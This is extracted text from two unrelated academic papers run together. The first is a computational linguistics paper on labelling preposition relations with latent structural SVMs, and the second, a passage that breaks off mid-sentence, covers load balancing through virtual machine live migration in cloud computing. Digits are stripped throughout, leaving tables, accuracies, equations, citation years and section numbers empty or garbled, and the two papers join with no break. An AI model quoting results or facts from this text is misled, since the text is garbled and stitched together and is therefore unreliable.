died of cancer co-participants pick one among these destination leaving for london direction drove towards the border endstate driven to tears experiencer warm towards her instrument cut with a knife journey travel by road location living in london manner scream like an animal mediumofcommunication new show on tv numeric increase by % objectofverb murder of the boys opponent/contrast fight with him other all others participant/accompanier steak with wine partwhole member of gang physicalsupport lean against the wall possessor son of a friend professionalaspect works in publishing purpose tools for making it recipient unkind to her separation ousted from power source purchased from the shop species city of prague startstate recover from illness temporal arrived on monday topic books on shakespeare table : list of preposition relations ning example, the relation label is cause. we rep- resent the predicted relation label by r. arguments the relation label crucially depends on correctly identifying the arguments of the prepo- sition, which are death and pneumonia in our run- ning example. while a parser can identify the argu- ments of a preposition, simply relying on the parser may impose an upper limit on the accuracy of rela- tion prediction. we build an oracle experiment to highlight this limitation. table shows the recall of the easy-first dependency parser of (goldberg and elhadad, ) on section of the penn treebank for identifying the governor and object of prepositions. we define heuristics that generate a candidate governors and objects for a preposition. for the gov- ernor, this set includes the previous verb or noun and for the object, it includes only the next noun. the row labeled best(parser, heuristics) shows the performance of an oracle predictor which selects the true governor/object if present among the parser’s prediction and the heuristics. we see that, even for the in-domain case, if we are able to re-rank the can- didates, we could achieve a big improvement in ar- gument identification. recall governor object parser . . best(parser, heuristics) . . table : identifying governor and object of prepositions in the penn treebank data. here, best(parser, heuris- tics) reports the performance of an oracle that picks the true governor and object, if present among the candidates presented by the parser and the heuristic. this presents an in-domain upper bound for governor and object detec- tion. see text for further details. to overcome erroneous parser decisions, we en- tertain governor and object candidates proposed both by the parser and the heuristics. in the follow- ing discussion, we denote the chosen governor and object by g and o respectively. argument types while the primary purpose of this work is to model preposition relations and their arguments, the relation prediction is strongly depen- dent on the semantic type of the arguments. to il- lustrate this, consider the following incomplete sen- tence: the message was delivered at · · · . this preposition can express both a temporal or a location relation depending on the object (for ex- ample, noon vs. the doorstep). (agirre et al., ) shows that modeling the se- mantic type of the arguments jointly with attachment can improve pp attachment accuracy. in this work, we point out that argument types should be modeled jointly with both aspects of the problem of preposi- tion relation labeling. types are an abstraction that capture common properties of groups of entities. for example, word- net provides generalizations of words in the form of their hypernyms. in our running example, we wish to generalize the relation label for death from pneu- monia to include cases such as suffering from flu. figure shows the hypernym hierarchy for the word pneumonia. in this case, synsets in the hypernym hierarchy, like pathological state or physical condi- tion, would also include ailments like flu. pneumonia => respiratory disease => disease => illness => ill health => pathological state => physical condition => condition => state => attribute => abstraction => entity figure : hypernym hierarchy for the word pneumonia we define a semantic type to be a cluster of words. in addition to wordnet hypernyms, we also cluster verbs, nouns and adjectives using the dependency- based word similarity of (lin, ) and treat cluster membership as types. these are described in detail in section . . relation prediction involves not only identifying the arguments, but also selecting the right semantic type for them, which together, help predicting the relation label. given an argument candidate and a collection of possible types (given by wordnet or the similarity based clusters), we need to select one of the types. for example, in the wordnet case, we need to pick one of the hypernyms in the hypernym hierarchy. thus, for the governor and object, we have a set of type labels, comprised of one element for each type category. we denote this by tg (gover- nor type) and to (object type) respectively. . problem definition the input to our prediction task is a preposition in a sentence. our goal is to jointly model the relation it expresses, the governor and the object of the rela- tion and the types of each argument (both wordnet hypernyms and cluster membership). we denote the input by x, which consists not only of the prepo- sition but also a set of candidates for the governor and the object and, for each type category, the list of types for the governor and candidate. the prediction, which we denote by y, consists of the relation r, which can be one of the valid re- lation labels in table and the governor and object, denoted by g and o, each of which is one of text seg- ments proposed by the parser or the heuristics. ad- ditionally, y also consists of type predictions for the governor and object, denoted by tg and to respec- tively, each of which is a vector of labels, one for each type category. table summarizes the nota- tion described above. we refer to the ith element of vectors using subscripts and use the superscript ∗ to denote gold labels. recall that we have gold labels only for the relation labels and not for arguments and their types. symbol meaning x input (pre-processed sentence and preposition) r relation label for the preposition g,o governor and object of the relation tg,to vectors of type assignments for governor and object respectively y full structure (r,g,o,tg,to) table : summary of notation learning preposition relations a key challenge in modeling preposition relations is that our training data only annotates the relation la- bels and not the arguments and types. in this section, we introduce two approaches for predicting preposi- tion relations using this data. . feature representation we use the notation Φ(x,y) to indicate the feature function for an input x and the full output y. we build Φ using the features of the components of y: . arguments: for g and o, which represent an assignment to the governor and object, we de- note the features extracted from the arguments as φa(x,g) and φa(x,o) respectively. . types: given a type assignment tgi to the i th type category of the governor, we define fea- tures φt (x,g,t g i ). similarly, we define features φt (x,o,t o i ) for the types of the object. we combine the argument and their type features to define the features for classifying the relation, which we denote by φ(x,g,o,tg,to): φ = ∑ a∈{g,o} ( φa(x,a) + ∑ i φt (x,a,t a i ) ) ( ) section describes the actual features used in our experiments. observe that given the arguments and their types, the task of predicting relations is simply a multiclass classification problem. thus, following the standard convention for multiclass classification, the overall feature representation for the relation and argument prediction is defined by conjoining the relation r with features for the corresponding arguments and types, φ. this gives us the full feature representa- tion, Φ(x,y). . model : predicting only relations the first model aims at predicting only the rela- tion labels and not the arguments and types. this falls into the standard multiclass classification set- ting, where we wish to predict one of labels. to do so, we sum over all the possible assignments to the rest of the structure and define features for the inputs as φ̂(x) = ∑ g,o,tg,to φ(x,g,o,tg,to) ( ) effectively, doing so uses all the governor and ob- ject candidates and all their semantic types to get a feature representation for the relation classifica- tion problem. once again, for a relation label r, the overall feature representation is defined by conjoin- ing the relation r with the features for that relation φ̂, which we write as φr(x,r). note that this sum- mation is computationally inexpensive in our case because the sum decomposes according to equation ( ). with a learned weight vector w, the relation label is predicted as r = arg max r′ wt φr(x,r ′) ( ) we use a structural svm (tsochantaridis et al., ) to train a weight vector w that predicts the re- lation label as above. the training is parameterized by c, which represents the tradeoff between gener- alization and the hinge loss. . model : learning from partial annotations in the second model, even though our annotation does not provide gold labels for arguments and types, our goal is to predict them. at inference time, if we had a weight vector w, we could predict the full structure using inference as follows: y = arg max y′ wt Φ(x,y) ( ) we propose an iterative learning algorithm to learn this weight vector. in the following discussion, for a labeled example (x,y∗), we refer to the missing part of its structure as h(y∗). that is, h(y∗) is the assignment to the arguments of the relation and their types. we use the notation r(y) to denote the relation label specified by a structure y. our learning algorithm is closely related to re- cently developed latent variable based frameworks (yu and joachims, ; chang et al., a; chang et al., b), where the supervision provides only partial annotation. we begin by defining two addi- tional inference procedures: . latent inference: given a weight vector w and a partially labeled example (x,y∗), we can ‘complete’ the rest of the structure by infer- ring the highest scoring assignment to the miss- ing parts. in the algorithm, we call this pro- cedure latentinf(w,x,y∗), which solves the following maximization problem: ŷ = arg maxy w t Φ(x,y), ( ) s.t. r(y) = r(y∗). . loss augmented inference: this is a variant of the the standard loss augmented inference for structural svms, which solves the follow- ing maximization problem for a given x and fully labeled y∗: arg max y wt Φ(x,y) + ∆(y,y∗) ( ) here, ∆(y,y∗) denotes the loss function. in the standard structural svms, the loss is over the entire structure. in the latent structural svm formulation of (yu and joachims, ), the loss is defined only over the part of the structure with the gold label. in this work, we use the standard hamming loss over the entire structure, but scale the loss for the elements of h(y) by a parameter α < . this is a gen- eralization of the latent structural svm, which corresponds to the setting α = . the intu- ition behind having a non-zero α is that in ad- dition to penalizing the learning algorithm if it violates the annotated part of the structure, we also incorporate a small penalty for the rest of the structure. using these two inference procedures, we define the learning algorithm as algorithm . the weight vector is initialized using model . the algorithm then finds the best arguments and types for all ex- amples in the training set (steps - ). doing so gives an estimate of the arguments and types for each example, giving us ‘fully labeled’ structured data. the algorithm then proceeds to use this data to train a new weight vector using the standard struc- tural svm with the loss augmented inference listed above (step ). these two steps are repeated several times. note that as with the summation in model , solving the inference problems described above is computationally inexpensive. algorithm algorithm for learning model input: examples d = {xi,r(y∗i )}, where exam- ples are labeled only with the relation labels. : initialize weight vector w using model : for t = , , · · · do : for (xi,y∗i ) ∈ d do : ŷi ← latentinf(w,xi,y∗i ) (eq. ) : end for : w ← learnssv m({xi, ŷi}) with the loss augmented inference of eq. : end for : return w algorithm is parameterized by c and α. the parameter α controls the extent to which the hypoth- esized labels according to the previous iteration’s weight vector influence the learning. . joint inference between preposition senses and relations by defining preposition relations as disjoint sets of preposition senses, we effectively have a hierarchi- cal relationship between senses and relations. this suggests that joint inference can be employed be- tween sense and relation predictions with a validity constraint connecting the two. the idea of employ- ing inference to combine independently trained pre- dictors to obtain a coherent output structure has been used for various nlp tasks in recent years, starting with the work of (roth and yih, ; roth and yih, ). we use the features defined by (hovy et al., ), which we write as φs(x,s) for a given input x and sense label s, and train a separate preposition sense model on the semeval data with features φs(x,s) using the structural svm algorithm. thus, we have two weight vectors – the one for predicting preposi- tion relations described earlier, and the preposition sense weight vector. at prediction time, for a given input, we find the highest scoring joint assignment to the relation, arguments and types and the sense, sub- ject to the constraint that the sense and the relation agree according to the definition of the relations. experiments and results the primary research goal of our experiments is to evaluate the different models (model , model and joint relation-sense inference) for predicting prepo- sition relations. in additional analysis experiments, we also show that the definition of preposition rela- tions indeed captures cross-preposition semantics by taking advantage of shared features and also high- light the need for going beyond the syntactic parser. . types and features types as described in section , we use wordnet hypernyms as one of the type categories. we use all hypernyms within four levels in the hypernym hier- archy for all senses. the second type category is defined by word- similarity driven clusters. we briefly describe the clustering process here. the thesaurus of (lin, ) specifies similar lexical items for a given word along with a similarity score from to . it treats nouns, verbs and adjectives separately. we use the score to cluster groups of similar words us- ing a greedy set-covering approach. specifically, we randomly select a word which is not yet in a cluster as the center of a new cluster and add all words whose score is greater than σ to it. we re- peat this process till all words are in some clus- ter. a word can appear in more than one cluster because all words similar to the cluster center are added to the cluster. we repeat this process for σ ∈{ . , . , . , . , . , . }. by increas- ing the value of σ, the clusters become more selec- tive and hence smaller. table shows example noun clusters created using σ = . . for a given word, identifiers for clusters to which the word belongs serve as type label candidates for this type category . features our argument features, denoted by φa in section . , are derived from the preposition sense feature set of (hovy et al., ) and extract the following from the argument: . word, part-of- speech, lemma and capitalization indicator, . con- flated part-of-speech (one of noun, verb, adjective, adverb, and other), . indicator for existence in wordnet, . wordnet synsets for the first and all senses, . wordnet lemma, lexicographer file names and part, member and substance holonyms, . roget thesaurus divisions for the word, . the first and last two and three letters, and . indicators for known af- fixes. our type features (φt ) are simply indicators for the type label, conjoined with the type category. one advantage of abstracting word senses into re- lations is that we can share features across different prepositions. the base feature set (for both types and arguments) defined above does not encode in- formation about the preposition to be classified. we do so by conjoining the features with the preposi- tion. in addition, since the relation labels are shared across all prepositions, we include the base features as a shared representation between prepositions. we consider two variants of our feature sets. we refer to the features described above as the typed features. in addition, we define the typed+gen features by conjoining argument and type features of typed with the name of the genera- tor that proposes the argument. recall that governor candidates are proposed by the dependency parser, or by the heuristics described earlier. hence, for the clusters can be downloaded from the authors’ website. jimmy carter; ronald reagan; richard nixon; george bush; lyndon johnson; richard m. nixon; gerald ford metalwork; porcelain; handicraft; jade; bronzeware; carving; pottery; ceramic; earthenware; jewelry; stoneware; lacquerware degradation; erosion; pollution; logging; desertification; siltation; urbanization; felling; poaching; soil erosion; depletion; water pollution; deforestation expert; wall street analyst; analyst; economist; telecommunications analyst; strategist; media analyst fox news channel; nbc news; msnbc; fox news; cnbc; cnnfn; c-span tuesdays; wednesdays; weekday; mondays; fridays; thursdays; sundays; saturdays table : examples of noun clusters generated using the set-covering approach for σ = . a governor, the typed+gen features would conjoin the corresponding typed features with one of parser, previous-verb, previous-noun, previous-adjective, or previous-word. . experimental setup and data all our experiments are based on the sem- eval data for preposition sense disambigua- tion (litkowski and hargraves, ) comprising word sense annotation over training and examples of prepositions labeled with their senses. we pre-processed sentences with part-of- speech tags using the illinois pos tagger and de- pendency graphs using the parser of (goldberg and elhadad, ) . for the experiments described be- low, we used the relation-annotated training set to train the models and evaluate accuracy of prediction on the test set. we chose the structural svm parameter c using five-fold cross-validation on a random exam- ples chosen from the training set. for model , we picked α = . using a validation set consisting of a separate set of training examples. we ran algorithm for rounds. predicting the most frequent relation for a prepo- sition gives an accuracy of . %. even though the performance of the most-frequent relation label is poor, it does not represent the problem’s difficulty and is not a good baseline. to compare, for prepo- sition senses, using features from the neighboring words, (ye and baldwin, ) obtained an accuracy of . %, and with features designed for the prepo- sition sense task, (hovy et al., ) get up to . % accuracy for the task. our re-implementation of the latter system using a different set of pre-processing tools gets an accuracy of . %. for preposition relations, our baseline system for we used the curator (clarke et al., ) for all pre- processing. relation labeling uses the typed feature set, but with- out any type information. this produces an accuracy of . % with model and . % with model . we report statistical significance of results using our implementation of dan bikel’s stratified-shuffling based statistical significance tester . . main results: relation prediction our main result, presented in table , compares the baseline model (without types) against other sys- tems, using both models described in section . first, we see that adding type information (typed) improves performance over the baseline. expand- ing the feature space (typed+gen) gives further im- provements. finally, jointly predicting the relations with preposition senses gives another improvement. setting accuracy model model no types . . typed . . typed+gen . ∗ . ∗ joint typed+gen & sense . ∗ . ∗† table : main results: accuracy of relation labeling. results in bold are statistically significant (p < . ) improvements over the system that is unaware of types. superscripts ∗ and † indicate significant improvements over typed and typed+gen respectively at p < . . for model , the improvement of typed over the model with- out types is significant at p < . . our objective is not predicting preposition sense. however, we observe that with model , jointly pre- dicting the sense and relations improves not only the performance of relation identification, but via joint inference between relations and senses also leads to a large improvement in sense prediction accuracy. table shows the accuracy for sense prediction. we http://www.cis.upenn.edu/∼dbikel/software.html see that while model does not lead to a significant improvement in the accuracy, model gives an ab- solute improvement of over %. setting sense accuracy hovy (re-implementation) . joint + model . joint + model . ∗ table : sense prediction performance. joint inference with model , while improving relation performance, does not help sense accuracy in comparison to our re- implementation of the hovy sense disambiguation sys- tem. however, with model , the improvement is statis- tically significant at p < . . . ablation experiments feature sharing across prepositions in our first analysis experiment, we seek to highlight the utility of sharing features between different prepositions. to do so, we compare the performance of a sys- tem trained without shared features against the type- independent system, which uses shared features. to discount the influence of other factors, we use model in the typed setting without any types. table reports the accuracy of relation prediction for these two feature sets. we observed a similar improve- ment in performance even when type features are added or the setting is changed to typed+gen or with model . setting accuracy independent . + shared . table : comparing the effect of feature sharing across prepositions. we see that having a shared representation that goes across prepositions improves accuracy of rela- tion prediction (p < . ). different argument candidate generators our second ablation study looks at the effect of the var- ious argument candidate generators. recall that in addition to the dependency governor and object, our models also use the previous word, the previous noun, adjective and verb as governor candidates and the next noun as object candidate. we refer to the candidates generated by the parser as parser only and the others as heuristics only. table compares the performance of these two argument candidate generators against the full set using model in both the typed and typed+gen settings. we see that the heuristics give a better accu- racy than the parser based system. this is because the heuristics often contain the governor/object pre- dicted by the dependency. this is not always the case, though, because using all generators gives a slightly better performing system (not statistically significant). in the overall system, we retain the de- pendency parser as one of the generators in order to capture long-range governor/object candidates that may not be in the set selected by the heuristics. feature sets generator typed typed+gen parser only . . heuristics only . . all . . table : the performance of different argument candi- date generators. we see that considering a larger set of candidate generators gives a big accuracy improvement. discussion there are two key differences between model and . first, the former predicts only the relation label, while the latter predicts the entire structure. table shows example predictions of model for relation label and wordnet argument types. these examples show how the argument types can be thought of as an explanation for the choice of relation label. input relation hypernyms governor object died of pneumonia cause experience disease suffered from flu cause experience disease recovered from flu startstate change disease table : example predictions according to model . the hypernyms column shows a representative of the synset chosen for the wordnet types. we see that in the com- bination of experience and disease suggests the relation cause while the change and disease indicate the rela- tion startstate. the main difference between the two models is in the treatment of the unlabeled (or latent) parts of the structure (namely, the arguments and the types) during training and inference. during training, for each example, model aggregates features from all governors and objects even if they are possibly ir- relevant, which may lead to a much bigger model in terms of the number of active weights. on the other hand, for model , algorithm uses the single high- est scoring prediction of the latent variables, accord- ing to the current parameters, to refine the parame- ters. indeed, in our experiments, we observed that the number of non-zero weights in the weight vec- tor of model is much smaller than that of model . for instance, in the typed setting, the weight vec- tor for model had . million elements while that for model had only . million weights. similarly, for the typed+gen setting, model had . million non-zero elements in the weight vector while model had only . million non-zero elements. the learning algorithm itself is a generalization of the latent structural svm of (yu and joachims, ). by setting α to zero, we get the latent struc- ture svm. however, we found via cross-validation that this is not the best setting of the parameter. a theoretical understanding of the sparsity of weights learned by the algorithm and a study of its conver- gence properties is an avenue of future research. conclusion we addressed the problem of modeling semantic re- lations expressed by prepositions. we approached this task by defining a set of preposition relations that combine preposition senses across prepositions. doing so allowed us to leverage existing annotated preposition sense data to induce a corpus for prepo- sition labels. we modeled preposition relations in terms of its arguments, namely the governor and ob- ject of the preposition, and the semantic types of the arguments. using a generalization of the latent structural svm, we trained a relation, argument and type predictor using only annotated relation labels. this allowed us to get an accuracy of . % on re- lation prediction. by employing joint inference with a preposition sense predictor, we further improved the relation accuracy to . %. acknowledgments the authors wish to thank martha palmer, nathan schneider, the anonymous reviewers and the editor for their valuable feed- back. the authors gratefully acknowledge the support of the defense advanced research projects agency (darpa) ma- chine reading program under air force research laboratory (afrl) prime contract no. fa - -c- . this material is also based on research sponsored by darpa under agree- ment number fa - - - . the u.s. government is au- thorized to reproduce and distribute reprints for governmental purposes notwithstanding any copyright notation thereon. the views and conclusions contained herein are those of the authors and should not be interpreted as necessarily representing the of- ficial policies or endorsements, either expressed or implied, of darpa, afrl or the u.s. government. references e. agirre, t. baldwin, and d. martinez. . improv- ing parsing and pp attachment performance with sense information. in proceedings of the annual meeting of the association for computational linguistics (acl), pages – , columbus, usa. t. baldwin, v. kordoni, and a. villavicencio. . prepositions in applications: a survey and introduc- tion to the special issue. computational linguistics, ( ): – . m. chang, d. goldwasser, d. roth, and v. srikumar. a. discriminative learning over constrained latent representations. in proceedings of the annual meet- ing of the north american association of computa- tional linguistics (naacl), pages – , los an- geles, usa. m. chang, v. srikumar, d. goldwasser, and d. roth. b. structured output learning with indirect super- vision. in proceedings of the international conference on machine learning (icml), pages – , haifa, israel. j. clarke, v. srikumar, m. sammons, and d. roth. . an nlp curator (or: how i learned to stop wor- rying and love nlp pipelines). in proceedings of the international conference on language resources and evaluation (lrec), pages – , istanbul, turkey. j. cohen. . a coefficient of agreement for nominal scales. educational and psychological measurement, : – . d. dahlmeier, h. t. ng, and t. schultz. . joint learning of preposition senses and semantic roles of prepositional phrases. in proceedings of the confer- ence on empirical methods for natural language pro- cessing (emnlp), pages – , singapore. d. das, n. schneider, d. chen, and n. smith. . probabilistic frame-semantic parsing. in proceedings of human language technologies: the annual conference of the north american chapter of the as- sociation for computational linguistics, pages – , los angeles, usa. c. fillmore, c. johnson, and m. petruck. . back- ground to framenet. international journal of lexi- cography, ( ): – . d. gildea and d. jurafsky. . automatic label- ing of semantic roles. computational linguistics, ( ): – . y. goldberg and m. elhadad. . an efficient algo- rithm for easy-first non-directional dependency pars- ing. in proceedings of human language technolo- gies: the annual conference of the north ameri- can chapter of the association for computational lin- guistics, pages – , los angeles, usa. d. hovy, s. tratz, and e. hovy. . what’s in a prepo- sition? dimensions of sense disambiguation for an in- teresting word class. in coling : posters, pages – , beijing, china. d. lin. . automatic retrieval and clustering of sim- ilar words. in proceedings of the annual meeting of the association for computational linguistics (acl), pages – , montreal, canada. k. litkowski and o. hargraves. . the preposition project. in acl-sigsem workshop on the linguistic dimensions of prepositions and their use in computa- tional linguistics formalisms and applications, pages – , colchester, uk. k. litkowski and o. hargraves. . semeval- task : word-sense disambiguation of prepositions. in proceedings of the fourth international workshop on semantic evaluations (semeval- ), pages – , prague, czech republic. k. litkowski. . proposed next steps for the prepo- sition project. technical report - , cl research. a. meyers, r. reeves, c. macleod, r. szekely, v. zielin- ska, b. young, and r. grishman. . the nom- bank project: an interim report. in hlt-naacl workshop: frontiers in corpus annotation, pages – , boston, usa. t. o’hara and j. wiebe. . exploiting semantic role resources for preposition disambiguation. computa- tional linguistics, ( ): – . m. palmer, d. gildea, and p. kingsbury. . the proposition bank: an annotated corpus of semantic roles. computational linguistics, ( ): – . m. palmer, d. gildea, and n. xue. . semantic role labeling, volume . morgan & claypool publishers. v. punyakanok, d. roth, and w. yih. . the impor- tance of syntactic parsing and inference in semantic role labeling. computational linguistics, ( ). d. roth and w. yih. . a linear programming formu- lation for global inference in natural language tasks. in proceedings of the annual conference on compu- tational natural language learning (conll), pages – , boston, usa. d. roth and w. yih. . global inference for en- tity and relation identification via a linear program- ming formulation. introduction to statistical rela- tional learning. v. srikumar and d. roth. . a joint model for extended semantic role labeling. in proceedings of the conference on empirical methods in natural lan- guage processing (emnlp), edinburgh, scotland. s. tratz and d. hovy. . disambiguation of prepo- sition sense using linguistically motivated features. in proceedings of human language technologies: the annual conference of the north american chap- ter of the association for computational linguistics, companion volume: student research workshop and doctoral consortium, pages – , boulder, usa. s. tratz. . semantically-enriched parsing for natu- ral language understanding. ph.d. thesis, university of southern california. i. tsochantaridis, t. hofmann, t. joachims, and y. altun. . support vector machine learning for interde- pendent and structured output spaces. in proceedings of the international conference on machine learning (icml), pages – , banff, canada. p. ye and t. baldwin. . semantic role labeling of prepositional phrases. acm transactions on asian language information processing (talip), ( ): – . p. ye and t. baldwin. . melb-yb: preposition sense disambiguation using rich semantic features. in proceedings of the fourth international workshop on semantic evaluations (semeval- ), pages – , prague, czech republic. c. yu and t. joachims. . learning structural svms with latent variables. in proceedings of the inter- national conference on machine learning (icml), pages – , montreal, canada. b. zapirain, e. agirre, l. màrquez, and m. surdeanu. . selectional preferences for semantic role classi- fication. computational linguistics, pages – . international journal of advanced network monitoring and controls volume , no. , research and implementation of load balancing technology for cloud computing sun hong , wang weifeng , chen shiping and xu liping university of shanghai for science and technology, china, sunhong@usst.edu.cn university of shanghai for science and technology, china, wwfhuo@ .com university of shanghai for science and technology, china, chensp@usst.edu.cn university of shanghai for science and technology, china, email: @qq.com abstract. this article selects load balancing system technology to analyze, combines the live migration technology of virtual machine, and studys the frame of virtual machine live migration as well as the mathematical model applied to concrete process of the migration. the article presents that the process of combining the specific strategies of load balance to the frame of live migration, that the simulation experiment and conclusion to this total process. the study takes eucalyptus as experimental platform, and decides initial to take xen as experimental virtual machine. the article’s innovations are to optimize the design of virtual machine live migration in cloud environment, and to combine the specific strategies of load balance to the process of live migration. after designing and analyzing the specific strategies of load balance modularization, according to rationalizations that the technology of live migration can apply to the specific strategies of load balance, the study sets the measure index to evaluate load balance, and solute consequently the problem of load in cloud environment, which is realized in the process of live migration. it turned out that algorithm fusion raised has obvious performance advantages. keywords: cloud computing, visualization, modularization, live migration, load balance . introduction with the fast development of the internet and network, people rely more and more increasingly on the access to the internet for getting information. amount of data transmission in network and user request appears exploded increase, which raises a higher claim to server processing ability, and makes server sent answer-response in the shortest possible time on the basis that servers accept reasonably client request to improve user experience optimization. a huge amount of data and access request does cry for updating servers, which can response fleetly, are easy-to-use, and have high expansibility to expand network bandwidth in response to user request timely. the appearance of virtual machine live migration is the very effective approach to settle load imbalance. by means that the total virtual machine running state can mutual transfer smoothly between two physical hosts of random clusters, of course, which is processing and does not have any stagnant feelings for the users when it is necessary to migrate, virtual machine live migration can help cloud environment maintainer make full use of node server in the international journal of advanced network monitoring and controls volume , no. , cluster and dynamically achieve load balancing of cloud resources. the traditional load balance algorithm is based on task control allocation, when applied to the cloud environment, it has some disadvantages: small task control allocation particles, node load conditions vary greatly, load information cannot be updated in a timely manner, load balance algorithm [ ] will be misguided. task control allocation needs a central dispatcher, which is in full charge of dispatch and migration, the huge amount of dispatch and migration will make central dispatcher busy and cause disorders easily, which is also a major bottleneck of system performance. there will be more computational tasks in cloud computing environment, the complexity of allocation algorithm will face greater challenges and the availability of algorithm needs more attention. . framework design of dynamic of virtual machine in cloud environment . basic framework for dynamic migration of virtual machine the basic migration structure is implemented by four modules including monitor migration, operation migration, freezing and target domain arousal with the four functions of the corresponding modules to achieve[ ].as shown in figure . monitor migration module: the primary function of the primary module is to determine the source machine of the migration, the start time of the migration, and the target machine of the migration. the working mode of monitor migration module is determined by the purpose of migration. in order to ensure that the load of each node is balanced, the monitor signal is set in the virtual machine management program, the monitoring load operation of various nodes determines whether the monitor signal needs to migrate. operation migration module: the module is the most important module, and undertakes the most migration of the virtual machine and most work of the migration process. after the start of the migration, the module collects running information of the source machine, and at the same time sends “frozen” signal to freezing module to make the source machine downtime. then the module continues to copy the remaining pages, after the end of the copy, it sends a wake-up call to wake module of the destination machine. this process is the key part of the whole migration process, and directly influents the downtime in the migration process and migration time. freezing module: the module is mainly responsible for how to solve the system to provide users with uninterrupted service [ ] to make users feel the service without interruption. target domain arousal module: the function of this module is to determine the time to wake up the destination machine, to make sure that the arousal target machine is in line with the source machine on service, and how to maintain the consistency of the target domain and the original domain on service. after downtime, the module is operated to copy the remaining memory page and sends a wake-up call to wake module of the destination machine after the end of the copy. the direct consequence of downtime is to make the connecting device interrupt, peripheral device cannot connect to the virtual machine, which will certainly cause peripheral service is not timely or presents a variety of transmission errors. research and implementation of load balancing technology for cloud computing figure. basic dynamic migration module figure. dynamic migration framework optimization modules . dynamic migration framework optimization of virtual machine in order to increase the rate of load application and make migration process more smooth and effective, we make the frame design of the virtual machine dynamic migration optimized, and add module about the implementation of the load balancing. one load monitor module adds to the original monitor migration module, which is devoted to marking the operation information of current virtual machine, setting the trigger condition for migration, and paving the way for a subsequent migration to select the appropriate load. the other is mainly in charge of location and selection strategy after the start of the virtual machine migration. as shown in figure ,grey patterns mark three modules. . implementation of resource load balancing algorithm in cloud computing environment . overview of load balancing mutual use of servers is increasingly frequent, because there is a huge gap between the effective use of resources on the servers. some servers are often in a competition for resources state, some for a long time are rarely even without the use of resources, which greatly reduces the resource utilization of corresponding range of system and leads to the severe decrease of performance of the overall cluster system. load balance can be directly implemented by hardware level, for example increasing physical international journal of advanced network monitoring and controls volume , no. , device, and by software level, such as setting the relevant protocol and using specific software. hardware implementation is to install a load balancer connected to the external network, through which the server for user access in the load application and user can access the resources. hardware can make the processing capability of the cluster system stronger, at the same time, and promote the equalization performance, but it cannot effectively master real-time status of server, because it parses the data flow only from the network layer, which is not flexible enough. an effective load balancing algorithm not only be able to assign the load evenly to every server, which can reduce the users’ waiting time, but also need to migrate the load above the node over the load value to the node that does not cross the threshold or relatively easy to operate[ ]. load balancing problem is a classic combinatorial optimization problem. that distribution and redistribution of tasks and resources on each node ultimately make each node load benefit roughly in balance and improve the overall system performance is load balancing. load balancing algorithm, with respect to the load sharing algorithm, has a higher goal performing the more efficient allocation use of resources. . classificiation of load balancing load balancing varies and should be classified on application scope. classified on the task distribution and redistribution of the nodes to achieve the strategy of the algorithm, the load balancing technology can be classified as follows: ) implementation methods of hardware and software hardware load balancing primarily implements large system method in the high flow loss, and must increase the specific load balancer, of course, which will have better performance based on the increased cost. however software load balancing is applicable for some small and medium sized web sites or systems, software methods can be very convenient to be installed to the node server. the use of more commonly used url redirection in computer networks or a technique based on the internet such lvs to achieve a certain balanced load function can achieve the general equilibrium load demand. ) global and local methods classified according to the geographical distribution of the server, global load balancing technology is a certain degree of load balancing for multiple servers, which is distributed in the different regions. for access users, global load balancing technology automatically adjusts to the nearest point of the region by determining the location of the ip address. local load balancing technology can control scheduling process some node of node server cluster in a regional scale at the time to a certain degree and make the node load relatively balanced. the technology can strengthen practical effect through node server designed and make network bandwidth be even distributed to every node server in server cluster. ) dynamic and static methods the load balancing strategy in cloud computing is divided into two types, static state and dynamic state. the so-called dynamic decides from which overload node server chooses task and locates the target node to assign tasks according to the current state of the system. once a node task of the system is overloaded, some tasks on this overloaded node will be migrated to other nodes to process, and to achieve the results of dynamic equilibrium. certainly, task migration also brings additional consume research and implementation of load balancing technology for cloud computing to the system. according to the simple system information, the mathematical function scheduling algorithm is used to select the source node and then locate the destination node and assign tasks and execute, which is the static performance. static strategy implementation is relatively simple, but it is not fast enough and cannot dynamically adjust the information of each node as far as real-time response, and consequently some nodes utilization is very low. most of the typical static load balancing strategies are based on the prediction model, for example algorithm based on inheritance, which can predict the trend of nodes according to the current information and historical information of nodes, and then give priority to high available future nodes to resource scheduling and task allocation. . clound resource load balancing strategy there are a lot of physical servers in the cloud environment and these server specifications are not fully consistent. through virtualization technology, a single physical node can be modeled as a number of computing machine entities, these virtual machines assign dynamically automatically to the user according to the user’s requirements specification. but because of the user’s requirement specification is not consistent, and the configuration of all the physical servers in the cluster is also not consistent. traditional algorithm can balance load to a certain degree, but each algorithm itself have their obvious characteristics and deficiencies and exist such disadvantages, which makes the equalization effect disadvantaged and influences the service performance or causes other problems related [ ]. at present, the main base of load balancing strategy has been divided into types. no. is ratio strategy, no. is minimum number of connections strategy, no. is round-robin strategy, no. is fastest response time strategy. ratio strategy installs firstly the external request, and then pre-allocated to each load in a balanced state of the server. cloud environment system has servers, we can assume that the proportion of the probability of receiving a virtual machine migration request is : : : ,so each node server processing request is also different. the method is suitable to be responsible that the node server of load balance allocated according to the level of the hardware configuration, and set corresponding ratio depending on the corresponding processing efficiency, so that servers which have not the same properties can also be operated smoothly to prevent some servers overload and others in idle state. minimum number of connections strategy is that the hardware device responsible for the balanced effect monitors continuously and checks the number of connections on the relevant node server, selects a minimum number detected node as the purpose node of processing the request, which is suitable for application to long connections. round-robin strategy: the scheduler is applied to this strategy regardless of load status of destination node. as long as there is an external request, the request will be distributed to each node server, for example, there are servers in the cluster system, and the request servers will process are the same. because of handling all transactions on average, this way is only suitable for the same hardware configuration nodes. this mode achieves relatively simple, the algorithm is also very simple to design, and the system overheads less, only to deal with the small business which have small differences and spend a short time. fastest response time strategy: the hardware devices send requests to be processed to each node continuously, which node is the fastest on response speed, the request is forwarded to the node server. the algorithm is suitable for stringent real-time response, but this method does not consider the load state of the destination node, which is easily prone to heavy load and causes stress to the international journal of advanced network monitoring and controls volume , no. , high configure servers. . optimization algorithm of resource load balancing network nodes often contain memory resources, network bandwidth resources and other key resources. in order to describe accurately the use of various types of resources in the nodes, the load index vector is often used to describe. each of these components is corresponding to a key resource in the node, which is used to represent the load usage. the algorithms mainly focus on three kinds of resources: cpu, memory and network bandwidth. to ensure the efficient utilization of resources, we can comprehensively consider the cloud computing system, calculate the load of each server node, combine frame design with dynamic migration, make use of virtual machine migration technology, consider how to select the virtual machine from the over- load node how to determine the migration destination and coordinate the load of different servers. this paper focuses on the load balancing part of the module diagram, figure shown in figure. figure. load balancing algorithm module load monitor module: the resources between nodes are heterogeneous. in order to make the data value of the same kind of 